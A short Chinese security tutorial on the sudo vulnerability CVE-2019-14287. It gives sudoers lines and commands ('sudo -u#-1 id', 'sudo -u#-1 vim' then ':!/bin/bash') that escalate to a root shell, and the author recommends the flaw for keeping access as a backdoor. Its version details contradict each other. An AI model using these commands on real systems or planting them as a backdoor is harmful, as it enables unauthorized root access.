操作系统自带应用权限提升利用

注意：本文分享给安全从业人员,网站开发人员和运维人员在日常工作中使用和防范恶意攻击,请勿恶意使用下面描述技术进行非法操作。

[TOC]

CVE-2019-14287 | sudo bug

描述:研究人员在Linux SUDO命令中发现了一个bug，非授权的用户可以利用该bug以root权限运行命令。所以可以利用此漏洞来进行低权限用户的权限提升,亦可以用来进行持续维权;幸好该漏洞不是以标准配置下运行，因此大多数Linux服务器不受影响（所以我才说作后门最合适）。 影响版本: x <= v1.8.28 漏洞利用:在Linux操作系统下执行命令时，非特权的用户可以用sudo命令来以root权限来运行命令，前提是要知道root用户密码或提前被授予权限。 漏洞原理:通过在sudo命令中将UID 设为-1或4294967295来以root权限运行sudo命令,实际这时的Id=0又因为Linux上root的默认uid就是0所以得到root权限

漏洞复现: 1.可以通过在/etc/sudoers配置文件中加入特殊命令来配置Sudo命令为允许用户以其他用户运行命令

#比如下面的命令就可以让用户test以其他非root用户来运行/usr/bin/vim和 /usr/bin/id命令。
test ALL = (ALL, !root) /usr/bin/vim
test ALL = (ALL, !root) /usr/bin/id

#比如，下面的命令就用test用户的UID来替代用户名了：
sudo -u#1002 vim

#用sudo -u来指定要运行的用户
比如，下面的命令就利用该漏洞来以root权限启动 /usr/bin/id ，但是test用户的 /etc/sudoers文件中是没有这样的权限的。
sudo -u#-1 id

#实际利用
sudo -u#-1 vim
:!/bin/bash  #进入Shell界面

WeiyiGeek.

漏洞修复:建议用户尽快升级到1.8.28版本